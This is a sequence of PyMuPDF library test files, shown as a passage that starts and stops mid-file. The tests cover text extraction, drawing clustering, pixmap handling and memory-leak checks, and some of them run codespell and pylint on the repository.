        b'Related Tickers\nTTM\n12/31/2023\n12/31/2022\n12/31/2021\n12/31/2020\n14,918,000\n14,918,000\n6,853,000\n15,787,000\n24,269,000\n-17,628,000\n-17,628,000\n-4,347,000\n2,745,000\n-18,615,000\n2,584,000\n2,584,000\n2,511,000\n-23,498,000\n2,315,000\n25,110,000\n25,110,000\n25,340,000\n20,737,000\n25,935,000\n-8,236,000\n-8,236,000\n-6,866,000\n-6,227,000\n-5,742,000\n51,659,000\n51,659,000\n45,470,000\n27,901,000\n65,900,000\n-41,965,000\n-41,965,000\n-45,655,000\n-54,164,000\n-60,514,000\n-335,000\n-335,000\n-484,000\n--\n--\n6,682,000\n6,682,000\n-13,000\n9,560,000\n18,527,000\n \nYahoo Finance Plus Essential\naccess required.\nUnlock Access\nBreakdown\nOperating Cash\nFlow\nInvesting Cash\nFlow\nFinancing Cash\nFlow\nEnd Cash Position\nCapital Expenditure\nIssuance of Debt\nRepayment of Debt\nRepurchase of\nCapital Stock\nFree Cash Flow\n12/31/2020 - 6/1/1972\nGM\nGeneral Motors Compa\xe2\x80\xa6\n39.49 +1.23%\n\xc2\xa0\nRIVN\nRivian Automotive, Inc.\n15.39 -3.15%\n\xc2\xa0\nNIO\nNIO Inc.\n5.97 +0.17%\n\xc2\xa0\nSTLA\nStellantis N.V.\n25.63 +0.91%\n\xc2\xa0\nLCID\nLucid Group, Inc.\n3.7000 +0.54%\n\xc2\xa0\nTSLA\nTesla, Inc.\n194.77 +0.52%\n\xc2\xa0\nTM\nToyota Motor Corporati\xe2\x80\xa6\n227.09 +0.14%\n\xc2\xa0\nXPEV\nXPeng Inc.\n9.08 +0.89%\n\xc2\xa0\nFSR\nFisker Inc.\n0.5579 -11.46%\n\xc2\xa0\nCopyright \xc2\xa9 2024 Yahoo.\nAll rights reserved.\nPOPULAR QUOTES\nTesla\nDAX Index\nKOSPI\nDow Jones\nS&P BSE SENSEX\nSPDR S&P 500 ETF Trust\nEXPLORE MORE\nCredit Score Management\nHousing Market\nActive vs. Passive Investing\nShort Selling\nToday\xe2\x80\x99s Mortgage Rates\nHow Much Mortgage Can You Afford\nABOUT\nData Disclaimer\nHelp\nSuggestions\nSitemap\n',
    ]
    with pymupdf.open(path) as document:
        for i, page in enumerate(document):
            text = page.get_text()
            text_utf8 = text.encode('utf8')
            # Exact match only expected with ActualText support (MuPDF >= 1.24).
            if pymupdf.mupdf_version_tuple >= (1, 24):
                assert text_utf8 == text_utf8_expected[i]
            else:
                assert text_utf8 != text_utf8_expected[i]
def test_document_text():
    '''
    Compare timings and results of pymupdf.get_text() with different
    extraction methods: single-process, multiprocessing ('mp') and 'fork'
    (the latter skipped on Windows). All methods must return identical text.
    '''
    import platform
    import time
    path = os.path.abspath(f'{__file__}/../../tests/resources/mupdf_explored.pdf')
    concurrency = None
    def llen(texts):
        # Total length of all items; items may be str or pre-computed lengths.
        total = 0
        for text in texts:
            total += len(text) if isinstance(text, str) else text
        return total
    _stats = 1
    print('')
    method = 'single'
    t = time.time()
    # NOTE(review): `document` appears unused, but is kept deliberately in case
    # keeping the Document open affects the timed runs - confirm before removing.
    document = pymupdf.Document(path)
    texts0 = pymupdf.get_text(path, _stats=_stats)
    t0 = time.time() - t
    print(f'{method}: {t0=} {llen(texts0)=}', flush=1)
    # Dummy run seems to avoid misleading stats with slow first run.
    method = 'mp'
    texts = pymupdf.get_text(path, concurrency=concurrency, method=method, _stats=_stats)
    method = 'mp'
    t = time.time()
    texts = pymupdf.get_text(path, concurrency=concurrency, method=method, _stats=_stats)
    t = time.time() - t
    print(f'{method}: {concurrency=} {t=} ({t0/t:.2f}x) {llen(texts)=}', flush=1)
    assert texts == texts0
    if platform.system() != 'Windows':
        # os.fork() is unavailable on Windows.
        method = 'fork'
        t = time.time()
        texts = pymupdf.get_text(path, concurrency=concurrency, method='fork', _stats=_stats)
        t = time.time() - t
        print(f'{method}: {concurrency=} {t=} ({t0/t:.2f}x) {llen(texts)=}', flush=1)
        assert texts == texts0
    if _stats:
        pymupdf._log_items_clear()
def test_3594():
    """Extract text from every page of test_3594.pdf (issue #3594).

    On MuPDF < 1.24.3 the file is expected to produce MuPDF warnings.
    """
    verbose = 0
    print()
    document_path = os.path.abspath(f'{__file__}/../../tests/resources/test_3594.pdf')
    doc = pymupdf.open(document_path)
    for i, page in enumerate(doc.pages()):
        text = page.get_text()
        print(f'Page {i}:')
        if verbose:
            for line in text.split('\n'):
                print(f'    {line!r}')
        print('='*40)
    if pymupdf.mupdf_version_tuple < (1, 24, 3):
        # We expect MuPDF warnings.
        warnings_text = pymupdf.TOOLS.mupdf_warnings()
        assert warnings_text
def test_3687():
    '''
    Open two EPUB documents and extract page-0 text; afterwards exactly one
    'unknown epub version: 3.0' warning must have been emitted (issue #3687).
    '''
    # NOTE(review): despite their names, path1/path2 are Document objects, and
    # each is then passed to pymupdf.open() again inside the loop - confirm
    # that re-opening from a Document (rather than a path) is intentional.
    path1 = pymupdf.open(os.path.normpath(f'{__file__}/../../tests/resources/test_3687.epub'))
    path2 = pymupdf.open(os.path.normpath(f'{__file__}/../../tests/resources/test_3687-3.epub'))
    for path in path1, path2:
        print(f'Looking at {path=}.')
        with pymupdf.open(path) as document:
            page = document[0]
            text = page.get_text("text")
            print(f'{text=!s}')
    # Accumulated MuPDF warnings must be exactly the epub-version warning.
    wt = pymupdf.TOOLS.mupdf_warnings()
    print(f'{wt=}')
    assert wt == 'unknown epub version: 3.0'
def test_3705():
    '''
    Check that leaving a page iterator early yields the same text as
    exhausting a generator over a (truncated) document (issue #3705),
    and that the expected ActualText warnings are emitted.
    '''
    path = os.path.normpath(f'{__file__}/../../tests/resources/test_3705.pdf')
    def get_all_page_from_pdf(document, last_page=None):
        # Restrict the document to at most `last_page` (and then 30) pages and
        # return a generator over the remaining pages.
        if last_page:
            document.select(list(range(0, last_page)))
        if document.page_count > 30:
            document.select(list(range(0, 30)))
        return iter(page for page in document)
    # (Removed unused local `filename = os.path.basename(path)`.)
    doc = pymupdf.open(path)
    texts0 = list()
    for i, page in enumerate(get_all_page_from_pdf(doc)):
        text = page.get_text()
        print(i, text)
        texts0.append(text)
    # Second pass: iterate the document directly and break out early.
    texts1 = list()
    doc = pymupdf.open(path)
    for page in doc:
        if page.number >= 30: # leave the iterator immediately
            break
        text = page.get_text()
        texts1.append(text)
    assert texts1 == texts0
    wt = pymupdf.TOOLS.mupdf_warnings()
    assert wt == 'Actualtext with no position. Text may be lost or mispositioned.\n... repeated 434 times...'
def test_3650():
    """Text blocks of page 0 of test_3650.pdf must extract as expected (issue #3650)."""
    path = os.path.normpath(f'{__file__}/../../tests/resources/test_3650.pdf')
    doc = pymupdf.Document(path)
    t = []
    for block in doc[0].get_text("blocks"):
        t.append(block[4])  # item 4 of a block tuple is its text
    print(f'{t=}')
    expected = [
        'RECUEIL DES ACTES ADMINISTRATIFS\n',
        'n° 78 du 28 avril 2023\n',
    ]
    assert t == expected
| 51,740 | Python | .py | 336 | 144.919643 | 5,155 | 0.758476 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,327 | gentle_compare.py | pymupdf_PyMuPDF/tests/gentle_compare.py | import math
import pymupdf
def gentle_compare(w0, w1):
    """Check lists of "words" extractions for approximate equality.

    * both lists must have same length
    * word items must contain same word strings
    * word rectangles must be approximately equal
    """
    tolerance = 1e-3  # maximum (Euclidean) norm of difference rectangle
    word_count = len(w0)  # number of words
    if len(w1) != word_count:
        print(f"different number of words: {word_count}/{len(w1)}")
        return False
    for i, (item0, item1) in enumerate(zip(w0, w1)):
        if item0[4] != item1[4]:  # word strings must be the same
            print(f"word {i} mismatch")
            return False
        # norm of the difference of the two word rectangles
        delta = (pymupdf.Rect(item1[:4]) - pymupdf.Rect(item0[:4])).norm()
        if delta > tolerance:
            print(f"word {i}: rectangle mismatch {delta}")
            return False
    return True
def pixmaps_rms(a, b, out_prefix=''):
    '''
    Returns RMS diff of raw bytes of two pixmaps. We assert that the pixmaps
    are the same size.
    <a> and <b> can each be a pymupdf.Pixmap or path of a bitmap file.
    <out_prefix> is prepended to every diagnostic line.
    '''
    if isinstance(a, str):
        print(f'{out_prefix}pixmaps_rms(): reading pixmap from {a=}.')
        a = pymupdf.Pixmap(a)
    if isinstance(b, str):
        print(f'{out_prefix}pixmaps_rms(): reading pixmap from {b=}.')
        b = pymupdf.Pixmap(b)
    assert a.irect == b.irect, f'Differing rects: {a.irect=} {b.irect=}.'
    a_mv = a.samples_mv
    b_mv = b.samples_mv
    assert len(a_mv) == len(b_mv)
    e = 0
    for i, (a_byte, b_byte) in enumerate(zip(a_mv, b_mv)):
        if i % 100000 == 0:
            # Periodic progress output. Bug fix: label said 'compare_pixmaps()'
            # but this function is pixmaps_rms().
            print(f'{out_prefix}pixmaps_rms(): {i=} {e=} {a_byte=} {b_byte=}.')
        e += (a_byte - b_byte) ** 2
    rms = math.sqrt(e / len(a_mv))
    print(f'{out_prefix}pixmaps_rms(): {e=} {rms=}.')
    return rms
| 1,949 | Python | .py | 48 | 33.895833 | 83 | 0.600528 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,328 | test_cluster_drawings.py | pymupdf_PyMuPDF/tests/test_cluster_drawings.py | import os
import pymupdf
scriptdir = os.path.dirname(__file__)
def test_cluster1():
    """Confirm correct identification of known examples."""
    if not hasattr(pymupdf, "mupdf"):
        print("Not executing 'test_cluster1' in classic")
        return
    # (file leaf name, expected number of drawing clusters on page 0)
    expectations = (
        ("symbol-list.pdf", 10),
        ("chinese-tables.pdf", 2),
    )
    for leaf, expected_count in expectations:
        document = pymupdf.open(os.path.join(scriptdir, "resources", leaf))
        first_page = document[0]
        assert len(first_page.cluster_drawings()) == expected_count
def test_cluster2():
    """Join disjoint but neighbored drawings."""
    if not hasattr(pymupdf, "mupdf"):
        print("Not executing 'test_cluster2' in classic")
        return
    document = pymupdf.open()
    page = document.new_page()
    rect_a = pymupdf.Rect(100, 100, 200, 200)
    rect_b = pymupdf.Rect(203, 203, 400, 400)
    for rect in (rect_a, rect_b):
        page.draw_rect(rect)
    # Close neighbors must be clustered into their joint rectangle.
    assert page.cluster_drawings() == [rect_a | rect_b]
def test_cluster3():
    """Confirm as separate if neighborhood threshold exceeded."""
    if not hasattr(pymupdf, "mupdf"):
        print("Not executing 'test_cluster3' in classic")
        return
    document = pymupdf.open()
    page = document.new_page()
    rect_a = pymupdf.Rect(100, 100, 200, 200)
    rect_b = pymupdf.Rect(204, 200, 400, 400)
    for rect in (rect_a, rect_b):
        page.draw_rect(rect)
    # Gap exceeds the clustering threshold: rectangles stay separate.
    assert page.cluster_drawings() == [rect_a, rect_b]
| 1,436 | Python | .py | 40 | 30.725 | 73 | 0.655148 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,329 | test_codespell.py | pymupdf_PyMuPDF/tests/test_codespell.py | import pymupdf
import os
import platform
import shlex
import subprocess
import sys
import textwrap
def test_codespell():
    '''
    Check rebased Python code with codespell.

    Builds and runs a `codespell` command over all git-tracked files (except
    binary image/PDF files and a hard-coded skip list).
    '''
    if not hasattr(pymupdf, 'mupdf'):
        print('Not running codespell with classic implementation.')
        return
    if platform.system() == 'Windows':
        # Git commands seem to fail on Github Windows runners.
        print('test_codespell(): Not running on Windows')
        return
    root = os.path.abspath(f'{__file__}/../..')
    # For now we ignore files that we would ideally still look at, because it
    # is difficult to exclude some text sections.
    skips = textwrap.dedent('''
            *.pdf
            changes.txt
            docs/_static/prism/prism.js
            docs/_static/prism/prism.js
            docs/locales/ja/LC_MESSAGES/changes.po
            docs/locales/ja/LC_MESSAGES/recipes-common-issues-and-their-solutions.po
            docs/recipes-common-issues-and-their-solutions.rst
            docs/recipes-text.rst
            docs/samples/national-capitals.py
            locales
            src_classic/*
            tests
            tests/test_story.py
            tests/test_textbox.py
            tests/test_textextract.py
            ''')
    skips = skips.strip().replace('\n', ',')
    command = textwrap.dedent(f'''
            cd {root} && codespell
                --skip {shlex.quote(skips)}
                --ignore-words-list re-use,flate,thirdparty
            ''')
    # Bug fix: we used to sys.path.append(root) but then `del sys.path[0]`,
    # which removed an unrelated entry and left `root` on sys.path. Insert at
    # the front so the finally-clause removes exactly what we added (this also
    # matches test_pylint.py).
    sys.path.insert(0, root)
    try:
        import pipcl
    finally:
        del sys.path[0]
    git_files = pipcl.git_items(root)
    for p in git_files:
        _, ext = os.path.splitext(p)
        if ext in ('.png', '.pdf', '.jpg', '.svg'):
            pass
        else:
            command += f' {p}\n'
    if platform.system() != 'Windows':
        command = command.replace('\n', ' \\\n')
    # Don't print entire command because very long, and will be displayed
    # anyway if there is an error.
    print('Running codespell.')
    subprocess.run(command, shell=1, check=1)
    print('test_codespell(): codespell succeeded.')
| 2,242 | Python | .py | 64 | 26.3125 | 84 | 0.598783 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,330 | test_pylint.py | pymupdf_PyMuPDF/tests/test_pylint.py | import pymupdf
import os
import re
import subprocess
import sys
import textwrap
def test_pylint():
    '''
    Run pylint on the rebased src/*.py files, with a long list of disabled
    message IDs (some deliberate, some still to be fixed).
    '''
    if not hasattr(pymupdf, 'mupdf'):
        print(f'test_pylint(): Not running with classic implementation.')
        return
    # Pylint message IDs we deliberately disable.
    ignores = ''
    ignores += textwrap.dedent(
        '''
        C0103: Constant name "g_exceptions_verbose" doesn't conform to UPPER_CASE naming style (invalid-name)
        C0115: Missing class docstring (missing-class-docstring)
        C0116: Missing function or method docstring (missing-function-docstring)
        C0301: Line too long (142/100) (line-too-long)
        C0302: Too many lines in module (23586/1000) (too-many-lines)
        C0303: Trailing whitespace (trailing-whitespace)
        C0325: Unnecessary parens after 'not' keyword (superfluous-parens)
        C0415: Import outside toplevel (traceback) (import-outside-toplevel)
        R0902: Too many instance attributes (9/7) (too-many-instance-attributes)
        R0903: Too few public methods (1/2) (too-few-public-methods)
        R0911: Too many return statements (9/6) (too-many-return-statements)
        R0913: Too many arguments (6/5) (too-many-arguments)
        R1705: Unnecessary "elif" after "return", remove the leading "el" from "elif" (no-else-return)
        R1720: Unnecessary "elif" after "raise", remove the leading "el" from "elif" (no-else-raise)
        R1724: Unnecessary "elif" after "continue", remove the leading "el" from "elif" (no-else-continue)
        R1735: Consider using '{}' instead of a call to 'dict'. (use-dict-literal)
        W0511: Fixme: we don't support JM_MEMORY=1. (fixme)
        W0622: Redefining built-in 'FileNotFoundError' (redefined-builtin)
        W0622: Redefining built-in 'open' (redefined-builtin)
        W1309: Using an f-string that does not have any interpolated variables (f-string-without-interpolation)
        R1734: Consider using [] instead of list() (use-list-literal)
        '''
    )
    # Items that we might want to fix.
    ignores += textwrap.dedent(
        '''
        C0114: Missing module docstring (missing-module-docstring)
        C0117: Consider changing "not rotate % 90 == 0" to "rotate % 90 != 0" (unnecessary-negation)
        C0123: Use isinstance() rather than type() for a typecheck. (unidiomatic-typecheck)
        C0200: Consider using enumerate instead of iterating with range and len (consider-using-enumerate)
        C0201: Consider iterating the dictionary directly instead of calling .keys() (consider-iterating-dictionary)
        C0209: Formatting a regular string which could be an f-string (consider-using-f-string)
        C0305: Trailing newlines (trailing-newlines)
        C0321: More than one statement on a single line (multiple-statements)
        C1802: Do not use `len(SEQUENCE)` without comparison to determine if a sequence is empty (use-implicit-booleaness-not-len)
        C1803: "select == []" can be simplified to "not select", if it is strictly a sequence, as an empty list is falsey (use-implicit-booleaness-not-comparison)
        R0912: Too many branches (18/12) (too-many-branches)
        R0914: Too many local variables (20/15) (too-many-locals)
        R0915: Too many statements (58/50) (too-many-statements)
        R1702: Too many nested blocks (7/5) (too-many-nested-blocks)
        R1703: The if statement can be replaced with 'var = bool(test)' (simplifiable-if-statement)
        R1710: Either all return statements in a function should return an expression, or none of them should. (inconsistent-return-statements)
        R1714: Consider merging these comparisons with 'in' by using 'width not in (1, 0)'. Use a set instead if elements are hashable. (consider-using-in)
        R1716: Simplify chained comparison between the operands (chained-comparison)
        R1717: Consider using a dictionary comprehension (consider-using-dict-comprehension)
        R1718: Consider using a set comprehension (consider-using-set-comprehension)
        R1719: The if expression can be replaced with 'bool(test)' (simplifiable-if-expression)
        R1721: Unnecessary use of a comprehension, use list(roman_num(num)) instead. (unnecessary-comprehension)
        R1728: Consider using a generator instead 'max(len(k) for k in item.keys())' (consider-using-generator)
        R1728: Consider using a generator instead 'max(len(r.cells) for r in self.rows)' (consider-using-generator)
        R1730: Consider using 'rowheight = min(rowheight, height)' instead of unnecessary if block (consider-using-min-builtin)
        R1731: Consider using 'right = max(right, x1)' instead of unnecessary if block (consider-using-max-builtin)
        W0105: String statement has no effect (pointless-string-statement)
        W0107: Unnecessary pass statement (unnecessary-pass)
        W0212: Access to a protected member _graft_id of a client class (protected-access)
        W0602: Using global for 'CHARS' but no assignment is done (global-variable-not-assigned)
        W0602: Using global for 'EDGES' but no assignment is done (global-variable-not-assigned)
        W0603: Using the global statement (global-statement)
        W0612: Unused variable 'keyvals' (unused-variable)
        W0613: Unused argument 'kwargs' (unused-argument)
        W0621: Redefining name 'show' from outer scope (line 159) (redefined-outer-name)
        W0640: Cell variable o defined in loop (cell-var-from-loop)
        W0718: Catching too general exception Exception (broad-exception-caught)
        W0719: Raising too general exception: Exception (broad-exception-raised)
        C3001: Lambda expression assigned to a variable. Define a function using the "def" keyword instead. (unnecessary-lambda-assignment)
        R0801: Similar lines in 2 files
        R0917: Too many positional arguments (7/5) (too-many-positional-arguments)
        '''
    )
    # Extract the 5-character message IDs from the human-readable lines above.
    ignores_list = list()
    for line in ignores.split('\n'):
        if not line or line.startswith('#'):
            continue
        m = re.match('^(.....): ', line)
        assert m, f'Failed to parse {line=}'
        ignores_list.append(m.group(1))
    ignores = ','.join(ignores_list)
    root = os.path.abspath(f'{__file__}/../..')
    sys.path.insert(0, root)
    import pipcl
    del sys.path[0]
    # We want to run pylist on all of our src/*.py files so we find them with
    # `pipcl.git_items()`. However this seems to fail on github windows with
    # `fatal: not a git repository (or any of the parent directories): .git` so
    # we also hard-code the list and verify it matches `git ls-files` on other
    # platforms. This ensures that we will always pick up new .py files in the
    # future.
    #
    command = f'pylint -d {ignores}'
    directory = f'{root}/src'
    directory = directory.replace('/', os.sep)
    # Hard-coded expected list of src/*.py leaf names.
    leafs = [
            '__init__.py',
            '__main__.py',
            '_apply_pages.py',
            'fitz___init__.py',
            'fitz_table.py',
            'fitz_utils.py',
            'pymupdf.py',
            'table.py',
            'utils.py',
            ]
    leafs.sort()
    try:
        leafs_git = pipcl.git_items(directory)
    except Exception as e:
        # Expected only on Windows runners, where git commands can fail.
        import platform
        assert platform.system() == 'Windows'
    else:
        leafs_git = [i for i in leafs_git if i.endswith('.py')]
        leafs_git.sort()
        assert leafs_git == leafs, f'leafs:\n    {leafs!r}\nleafs_git:\n    {leafs_git!r}'
    for leaf in leafs:
        command += f' {directory}/{leaf}'
    print(f'Running: {command}')
    subprocess.run(command, shell=1, check=1)
| 7,884 | Python | .py | 129 | 50.713178 | 166 | 0.653098 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,331 | test_linequad.py | pymupdf_PyMuPDF/tests/test_linequad.py | """
Check approx. equality of search quads versus quads recovered from
text extractions.
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "quad-calc-0.pdf")
def test_quadcalc():
    """Search quads must match quads recovered from a 'dict' text extraction."""
    text = " angle 327"  # search for this text
    doc = pymupdf.open(filename)
    page = doc[0]
    # This special page has one block with one line, and its last span
    # contains the searched text.
    line = page.get_text("dict", flags=0)["blocks"][0]["lines"][0]
    # compute quad of the last span in the line
    lineq = pymupdf.recover_line_quad(line, spans=line["spans"][-1:])
    # let text search find the text, returning quad coordinates
    searchq = page.search_for(text, quads=True)[0]
    # all four corners must agree to within 1e-4
    for corner in ("ul", "ur", "ll", "lr"):
        assert abs(getattr(searchq, corner) - getattr(lineq, corner)) <= 1e-4
| 975 | Python | .py | 25 | 35.24 | 69 | 0.683598 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,332 | test_import.py | pymupdf_PyMuPDF/tests/test_import.py | import os
import subprocess
import sys
import textwrap
def test_import():
    '''Check that wildcard imports from pymupdf and its submodules succeed.'''
    root = os.path.abspath(f'{__file__}/../../')
    script_path = f'{root}/tests/resources_test_import.py'
    script_body = textwrap.dedent(
            '''
            from pymupdf.utils import *
            from pymupdf.table import *
            from pymupdf import *
            '''
            )
    with open(script_path, 'w') as f:
        f.write(script_body)
    # Run the generated script in a fresh interpreter; raises on failure.
    subprocess.run(f'{sys.executable} {script_path}', shell=1, check=1)
| 482 | Python | .py | 16 | 21.5 | 61 | 0.534483 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,333 | test_2791.py | pymupdf_PyMuPDF/tests/test_2791.py | import pymupdf
import gc
import os
import platform
import sys
def merge_pdf(content: bytes, coverpage: bytes):
    """Append `content` behind `coverpage` and return the merged PDF as bytes."""
    with pymupdf.Document(stream=coverpage, filetype='pdf') as coverpage_pdf, \
            pymupdf.Document(stream=content, filetype='pdf') as content_pdf:
        coverpage_pdf.insert_pdf(content_pdf)
        merged = coverpage_pdf.write()
    return merged
def test_2791():
    '''
    Check for memory leaks.

    Repeatedly merges two PDFs, sampling memory usage after each iteration,
    then asserts that the last/early-sample ratio stays within known bounds
    (only on Linux, rebased implementation, Python >= 3.11).
    '''
    if os.environ.get('PYMUPDF_RUNNING_ON_VALGRIND') == '1':
        print(f'test_2791(): not running because PYMUPDF_RUNNING_ON_VALGRIND=1.')
        return
    if platform.system().startswith('MSYS_NT-'):
        print(f'test_2791(): not running on msys2 - psutil not available.')
        return
    #stat_type = 'tracemalloc'
    stat_type = 'psutil'
    # Select a memory-measurement callback according to stat_type.
    if stat_type == 'tracemalloc':
        import tracemalloc
        tracemalloc.start(10)
        def get_stat():
            current, peak = tracemalloc.get_traced_memory()
            return current
    elif stat_type == 'psutil':
        # We use RSS, as used by mprof.
        import psutil
        process = psutil.Process()
        def get_stat():
            return process.memory_info().rss
    else:
        def get_stat():
            return 0
    n = 1000
    stats = [1] * n
    # Merge the same two PDFs n times, recording memory usage per iteration.
    for i in range(n):
        root = os.path.abspath(f'{__file__}/../../tests/resources')
        with open(f'{root}/test_2791_content.pdf', 'rb') as content_pdf:
            with open(f'{root}/test_2791_coverpage.pdf', 'rb') as coverpage_pdf:
                content = content_pdf.read()
                coverpage = coverpage_pdf.read()
                merge_pdf(content, coverpage)
        sys.stdout.flush()
        gc.collect()
        stats[i] = get_stat()
    print(f'Memory usage {stat_type=}.')
    for i, stat in enumerate(stats):
        sys.stdout.write(f' {stat}')
    sys.stdout.write('\n')
    # Compare a sample from near the start (skipping warm-up) with the last.
    first = stats[2]
    last = stats[-1]
    ratio = last / first
    print(f'{first=} {last=} {ratio=}')
    if platform.system() != 'Linux':
        # Values from psutil indicate larger memory leaks on non-Linux. Don't
        # yet know whether this is because rss is measured differently or a
        # genuine leak is being exposed.
        print(f'test_2791(): not asserting ratio because not running on Linux.')
    elif not hasattr(pymupdf, 'mupdf'):
        # Classic implementation has unfixed leaks.
        print(f'test_2791(): not asserting ratio because using classic implementation.')
    elif [int(x) for x in platform.python_version_tuple()[:2]] < [3, 11]:
        print(f'test_2791(): not asserting ratio because python version less than 3.11: {platform.python_version()=}.')
    elif stat_type == 'tracemalloc':
        # With tracemalloc Before fix to src/extra.i's calls to
        # PyObject_CallMethodObjArgs, ratio was 4.26; after it was 1.40.
        assert ratio > 1 and ratio < 1.6
    elif stat_type == 'psutil':
        # Prior to fix, ratio was 1.043. After the fix, improved to 1.005, but
        # varies and sometimes as high as 1.010.
        # 2024-06-03: have seen 0.99919 on musl linux, and sebras reports .025.
        assert ratio >= 0.990 and ratio < 1.027, f'{ratio=}'
    else:
        pass
| 3,282 | Python | .py | 80 | 33.075 | 119 | 0.614371 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,334 | test_pixmap.py | pymupdf_PyMuPDF/tests/test_pixmap.py | """
Pixmap tests
* make pixmap of a page and assert bbox size
* make pixmap from a PDF xref and compare with extracted image
* pixmap from file and from binary image and compare
"""
import pymupdf
import os
import platform
import sys
import tempfile
import pytest
import textwrap
scriptdir = os.path.abspath(os.path.dirname(__file__))
epub = os.path.join(scriptdir, "resources", "Bezier.epub")
pdf = os.path.join(scriptdir, "resources", "001003ED.pdf")
imgfile = os.path.join(scriptdir, "resources", "nur-ruhig.jpg")
def test_pagepixmap():
    """Render an EPUB page to pixmaps, without and with an alpha channel."""
    document = pymupdf.open(epub)
    first_page = document[0]
    pix = first_page.get_pixmap()
    assert pix.irect == first_page.rect.irect
    # Again with alpha: component count must grow by one.
    pix = first_page.get_pixmap(alpha=True)
    assert pix.alpha
    assert pix.n == pix.colorspace.n + pix.alpha
def test_pdfpixmap():
    """Pixmap built from an image xref must match extract_image() metadata."""
    document = pymupdf.open(pdf)
    # first image item of the first page: (xref, smask, width, height, ...)
    xref, _, width, height = document.get_page_images(0)[0][:4]
    pix = pymupdf.Pixmap(document, xref)
    assert pix.width == width
    assert pix.height == height
    # extract the image and compare its metadata
    info = document.extract_image(xref)
    assert info["width"] == pix.width
    assert info["height"] == pix.height
def test_filepixmap():
    '''
    Pixmaps built from a file path and from the file's bytes must be equal.
    '''
    pix1 = pymupdf.Pixmap(imgfile)
    # Bug fix: read the bytes with a context manager; the original left the
    # file object open (resource leak).
    with open(imgfile, "rb") as f:
        stream = f.read()
    pix2 = pymupdf.Pixmap(stream)
    assert repr(pix1) == repr(pix2)
    assert pix1.digest == pix2.digest
def test_pilsave():
    """Round-trip a pixmap through Pillow-encoded JPEG bytes."""
    try:
        original = pymupdf.Pixmap(imgfile)
        jpeg_bytes = original.pil_tobytes("JPEG")
        roundtripped = pymupdf.Pixmap(jpeg_bytes)
        assert repr(original) == repr(roundtripped)
    except ModuleNotFoundError:
        # Pillow is only expected to be missing on 32-bit Windows.
        assert platform.system() == 'Windows' and sys.maxsize == 2**31 - 1
def test_save(tmpdir):
    """Save a pixmap as PNG and confirm reloading gives an equal pixmap."""
    source = pymupdf.Pixmap(imgfile)
    outfile = os.path.join(tmpdir, "foo.png")
    source.save(outfile, output="png")
    # read it back and compare
    reloaded = pymupdf.Pixmap(outfile)
    assert repr(source) == repr(reloaded)
def test_setalpha():
    """Add an alpha channel with 30% transparency and verify the alpha bytes."""
    base = pymupdf.Pixmap(imgfile)
    opacity = int(255 * 0.3)  # byte value corresponding to 30% transparency
    alphas = bytearray([opacity] * (base.width * base.height))
    with_alpha = pymupdf.Pixmap(base, 1)  # add alpha channel
    with_alpha.set_alpha(alphas)  # make image 30% transparent
    samples = with_alpha.samples  # copy of the sample bytes
    # every 4th byte (RGBA layout) must be the alpha value we set
    assert bytearray(samples[3::4]) == alphas
def test_color_count():
    '''
    This is known to fail if MuPDF is built without PyMuPDF's custom config.h,
    e.g. in Linux system installs.
    '''
    pixmap = pymupdf.Pixmap(imgfile)
    distinct_colors = pixmap.color_count()
    assert distinct_colors == 40624
def test_memoryview():
    """samples_mv must be a flat 1-D byte memoryview over the pixmap samples."""
    pm = pymupdf.Pixmap(imgfile)
    samples = pm.samples_mv
    assert isinstance( samples, memoryview)
    print( f'samples={samples} samples.itemsize={samples.itemsize} samples.nbytes={samples.nbytes} samples.ndim={samples.ndim} samples.shape={samples.shape} samples.strides={samples.strides}')
    # expected memoryview geometry for this particular image
    expected = dict(itemsize=1, nbytes=659817, ndim=1, shape=(659817,), strides=(1,))
    for attribute, value in expected.items():
        assert getattr(samples, attribute) == value
    color = pm.pixel( 100, 100)
    print( f'color={color}')
    assert color == (83, 66, 40)
def test_samples_ptr():
    """samples_ptr must be a plain int (a raw pointer value)."""
    pixmap = pymupdf.Pixmap(imgfile)
    samples = pixmap.samples_ptr
    print( f'samples={samples}')
    assert isinstance(samples, int)
def test_2369():
    """Round-trip a blank gray pixmap: PAM -> PDF -> extracted image -> Pixmap."""
    width, height = 13, 37
    blank = pymupdf.Pixmap(pymupdf.csGRAY, width, height, b"\x00" * (width * height), False)
    with pymupdf.Document(stream=blank.tobytes(output="pam"), filetype="pam") as doc:
        test_pdf_bytes = doc.convert_to_pdf()
    with pymupdf.Document(stream=test_pdf_bytes) as doc:
        first_page = doc[0]
        img_xref = first_page.get_images()[0][0]
        extracted = doc.extract_image(img_xref)
    # constructing a Pixmap from the extracted bytes must not raise
    pymupdf.Pixmap(extracted["image"])
def test_page_idx_int():
    """Document indexing accepts int and (chapter, page) tuples, but not str."""
    document = pymupdf.open(pdf)
    with pytest.raises(AssertionError):
        document["0"]
    assert document[0]
    assert document[(0, 0)]
def test_fz_write_pixmap_as_jpeg():
    """A gray pixmap serialized as JPEG must open as a document and convert to PDF."""
    width, height = 13, 37
    gray = pymupdf.Pixmap(pymupdf.csGRAY, width, height, b"\x00" * (width * height), False)
    jpeg_bytes = gray.tobytes(output="jpeg")
    with pymupdf.Document(stream=jpeg_bytes, filetype="jpeg") as doc:
        doc.convert_to_pdf()
def test_3020():
    """Exercise several Pixmap copy/conversion constructors (issue #3020)."""
    source = pymupdf.Pixmap(imgfile)
